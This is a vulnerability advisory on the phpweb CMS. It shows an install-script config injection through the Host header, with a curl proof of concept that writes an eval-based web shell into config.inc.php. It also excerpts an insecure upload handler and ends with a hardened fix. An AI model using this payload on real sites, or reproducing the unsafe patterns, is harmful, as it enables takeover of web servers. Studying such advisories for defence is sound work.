phpweb finished website, latest version (injection, upload, shell write) - vulnerability warning - the black bar safety net


Injection: this one is of limited use because the exploit relies on the install file regenerating the configuration file, which lets executable code be written into it.

Limitation 1: the action is very destructive, because it rewrites the configuration file, which is the database connection file.

Limitation 2: webmasters with some security common sense will delete the install directory.

Although of limited use, it also has advantages: it is not affected by magic_quotes_gpc or by the web server.

Analysis:

```php
$siteurl="http://".$_SERVER["HTTP_HOST"]."/"; // Not filtered
// Read the configuration template
$filestr = fread(fopen($SysConfigFile, 'r'),30000);
$filestr=str_replace(" ","",$filestr);
// Substitute the submitted install values for the Default* placeholders
$filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
$filestr=str_replace("DefaultDbName",$dbname,$filestr);
$filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
$filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
$filestr=str_replace("DefaultsLan","EN",$filestr);
$filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
$filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
// Write the result out as the live configuration file
fwrite(fopen($ConFile,"w"),$filestr,30000);
```

$_SERVER["HTTP_HOST"] is passed in through the HOST field of the HTTP header, so it can be controlled, and it is not affected by magic_quotes_gpc ^_^

poc:

```
curl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
```

shell address: /config.inc.php

As with the earlier phpcms issue, a remote database is needed.

-------------------

Upload vulnerability (need feed back):

Vulnerability file: /kedit/upload_cgi/upload.php

Many people know this one, but it is of very limited use: it can only be used under IIS6 parsing or GPC-off conditions.

```php
<?php
define("ROOTPATH", "../../");
include(ROOTPATH."includes/admin.inc.php");
NeedAuth(0);
$dt=date("Ymd",time());
if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
@mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
}
// Directory path the file is saved to
$save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
echo $save_path;
// Directory URL the file is saved under
$save_url = '../../'.$_POST['attachPath'].$dt.'/';
// Allowed upload file extensions
$ext_arr = array('gif','jpg','png','bmp'); // limit suffix
// Maximum file size
$max_size = 1000000;
// Change directory permissions
@mkdir($save_path, 0777);
// Full file path
$file_path = $save_path.$_POST['fileName']; // save file name
// File URL
$file_url = $save_url.$_POST['fileName'];
```
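Going back to the install-time configuration rewrite analysed above, this is a hardened form of that step, added here as an example and not phpweb's own code. The function names `safe_site_url()` and `render_config()` and the sample template are assumptions; the `Default*` placeholders are the ones shown in the install code.

```php
<?php
// Added example; not phpweb code. safe_site_url() and render_config() are
// hypothetical names, and $template is a constructed stand-in for the real one.

// Allow only hostname labels and an optional port, so quotes, semicolons,
// "#" and whitespace from the Host header never reach the config file.
function safe_site_url(string $hostHeader): string
{
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    $re = '/\A' . $label . '(?:\.' . $label . ')*(?::[0-9]{1,5})?\z/i';
    if (strlen($hostHeader) > 259 || !preg_match($re, $hostHeader)) {
        throw new InvalidArgumentException('rejected Host header');
    }
    return 'http://' . strtolower($hostHeader) . '/';
}

// Replace each quoted placeholder with a PHP literal produced by var_export(),
// which escapes backslashes and quotes. strtr() substitutes in a single pass,
// so one value cannot smuggle in another placeholder name.
function render_config(string $template, array $values): string
{
    $map = [];
    foreach ($values as $placeholder => $value) {
        $map['"' . $placeholder . '"'] = var_export((string) $value, true);
    }
    return strtr($template, $map);
}

// Constructed template: placeholders sit inside double-quoted PHP strings.
$template = "<?php\n\$dbpwd=\"DefaultDbPass\";\n\$SiteUrl=\"DefaultSiteUrl\";\n";

// Host value taken from the PoC above: rejected before anything is written.
try {
    safe_site_url('localhost";eval($_REQUEST[a]);#');
} catch (InvalidArgumentException $e) {
    echo "install aborted: ", $e->getMessage(), "\n";
}

// A legitimate host plus a password that contains quote characters.
echo render_config($template, [
    'DefaultDbPass'  => 'p"a\'ss\\',
    'DefaultSiteUrl' => safe_site_url('shop.example.com:8080'),
]);
```

The `var_export()` step applies equally to `dbhost`, `dbname`, `dbuser`, `dbpwd` and `tablepre`, which reach the same `str_replace()` calls, so the written file does not depend on magic_quotes_gpc for its safety.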